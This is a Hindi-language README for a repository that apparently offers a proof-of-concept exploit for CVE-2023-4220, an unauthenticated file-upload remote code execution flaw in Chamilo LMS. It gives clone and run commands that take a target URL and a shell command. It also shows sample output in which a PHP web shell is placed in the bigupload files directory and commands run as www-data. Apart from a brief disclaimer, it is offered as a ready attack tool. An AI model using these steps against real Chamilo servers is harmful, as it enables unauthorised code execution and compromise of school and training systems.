
(CVE-2023-4220) Chamilo LMS अप्रमाणित बड़ी अपलोड फ़ाइल दूरस्थ कोड निष्पादन
इस रिपॉजिटरी में Chamilo LMS में CVE-2023-4220 के रूप में पहचानी गई भेद्यता के लिए एक प्रूफ-ऑफ़-कॉन्सेप्ट (PoC) शोषण शामिल है। यह शोषण एक अप्रमाणित फ़ाइल अपलोड भेद्यता का लाभ उठाता है, जिससे दूरस्थ हमलावर प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं।
अस्वीकरण: यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
इस रिलीज़ से पहले के Chamilo LMS संस्करण इस समस्या के लिए संवेदनशील हैं। यह भेद्यता फ़ाइल अपलोड के अनुचित सत्यापन और हैंडलिंग से उत्पन्न होती है, जिससे हमलावर सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड और निष्पादित कर सकते हैं।
यह शोषण Chamilo LMS में फ़ाइल अपलोड कार्यक्षमता को लक्षित करता है। PHP कोड वाली एक दुर्भावनापूर्ण फ़ाइल तैयार करके और इसे एक अप्रमाणित एंडपॉइंट के माध्यम से अपलोड करके, हमलावर सर्वर पर मनमाना कमांड निष्पादित कर सकता है।
git clone https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit.git
cd Chamilo-CVE-2023-4220-RCE-Exploit
लक्ष्य URL और वह कमांड जिसे आप निष्पादित करना चाहते हैं, तर्कों के रूप में पास करके शोषण चलाएँ:
python exploit.py <target_url> <command>
python3 exploit.py http://lms.target-site/ id --shell=my_shell.php
यह कमांड निम्नलिखित करेगा:
सफल होने पर, स्क्रिप्ट आउटपुट देगी:
For example:
[+] File uploaded successfully!
[+] Access the shell at: http://lms.target-site/main/inc/lib/javascript/bigupload/files/my_shell.php?cmd=
[+] Command Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।
किसी भी प्रश्न या समस्या के लिए, कृपया इस रिपॉजिटरी पर एक मुद्दा खोलें या मुझसे [medkamelbouzekria - at - gmail -dot - com] पर संपर्क करें।